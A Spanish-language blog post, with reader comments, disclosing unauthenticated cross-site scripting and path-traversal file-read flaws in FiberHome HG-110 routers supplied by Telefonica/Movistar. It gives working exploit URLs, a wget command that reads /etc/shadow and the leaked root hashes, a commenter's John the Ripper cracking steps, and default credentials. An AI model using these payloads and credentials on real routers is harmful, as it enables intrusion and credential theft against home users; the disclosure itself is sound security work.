Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar

/ Zerial / Hacking Seguridad

En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas:

Las vulnerabilidades que he encontrado son:

Cross-Site Scripting: https://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal: https://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

Para poder explotar estas vulnerabilidades no es necesario estar autenticado.

Informacion del dispositivo:
PRE0

No descarto que estas mismas (y otras) vulnerabilidades puedan afectar a otros modelos del mismo fabricante.

ACTUIALIZADO El httpd se ejecuta como "root" (mini_httpd) por lo que es posible acceder, mediante LFI, a archivos con esos privilegios.

$ wget -o /dev/null -O - "https://192.168.1.1:8000/cgi-bin /webproc?getpage=../../../../../../../../../../../../etc/shadow& var:menu=advanced&var:page=dns"

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

~ $ ps ax|grep httpd

509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo

~ $

#adsl #fiberhome #fiberhome hg110 #Hacking #hg110 #movistar #router #Seguridad #telefonica #vulnerabilidades #wireless

Comentarios (23)

raziel9854
gracias x la info... hay q ver q otras vulnerabilidades posee... xD
Brujo
$ ps ax|grep httpd

lo ejecutas en el router??? tiene una cuenta ssh??
Zerial
Hola Brujo:

Si, tiene cuenta ssh. Es un linux con servicio ssh
Brujo
gracias! muy buena info
Maztor
Una Correccion, las vulnerabilidades se pueden realizar de forma remota si el usuario esta Autenticado, de forma local Tambien necesita Autenticacion. ya que este solo puede ser visible con un logueo posterior.

POSIBLES RAZONES.

1- los Router los FIXEARON!
2- al realizar el Analisi pudistes dejar configuracion guardada sin Ninguna intencion por eso pudo Haberte surgido la explotacion sin Autenticacion.

Saludos! y Beuna Info!
Maztor
Segun mi Analisis, una posible solucion para evitar esto de forma remota seria abrir puerto 80 y hacer redireccionamiento a localhost definido sin uso del usuario, asi e atacante no podria sacar la interfaz de forma siple y generaria una confusion de.. Sera que tiene ftth o no?.

Espero les Sirva.
Zerial
Hola Maztor:

Las pruebas las hice con la config default, simplemente sacandolo de la caja y conectandolo a la corriente.
pperson67
Este router utiliza chipset Realtek (procesador RTL8672 adsl RTL8271B) con 32 Mb. de RAM y 8 Mb. de FLASH y es muy similar en hardware al HUAWEI HG532C comercializado en España. Seguramente pronto habra novedades respecto a mejorar su firmware...
club penguin cheats
good point ^^
infernal
como se llaman los cables que parecen coaxial de las antenas
y como es su configuración del hadware
r4c3
muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD
leonciokof
¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
Gracias.
Zerial
Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)
Claudio
Por defecto viene el puerto 443 (https) abierto para el exterior... uno puede desde afuera acceder a la configuración básica (donde se elige la clave wifi) sin necesidad de estar conectado a la red. Lo detecté con ShieldsUp! Mi solución fue hacer forward del puerto 443 al puerto 8765 (ese puse en mi caso) a la ip 192.168.1.1, usando la dirección (que tampoco requiere login) http://router_ip:port/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd
Claudio
Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.
AT-HE (atesin)
para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)

# obtienen el archivo passwd y el archivo shadow

wget ???http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/passwd&
var:menu=advanced&var:page=dns???
wget ???http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns???

# instalan el john the ripper, luego "juntan" los dos archivos

unshadow passwd shadow > fiberhome.pwd

# luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso

john -incremental:lanman fiberhome.pwd
Joao Paulo
Someone could decrypt the root password?
Zerial
hi Joao Paulo:

You can use a brute-force script to crack the shadow. Is not the same password at all.

cheers
Ivan
Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno... xd
jonathan
hola disculpen , alguno sabe cual es la contraseña admin del modem router?
saludos
Digital_freeak
admin:1234
dante
hola! Alguien sabe como cambiar el password del servicio SSH? para que no sea root root. Necesito el acceso SSH pero es bastante vulnerable. Ademas existe alguna forma de reiniciar el equipo usando SSH?. gracias.
Andrés
Este router tiene alguna vulnerabilidad si lo uso solo como repetidor de wifi?

Deja un comentario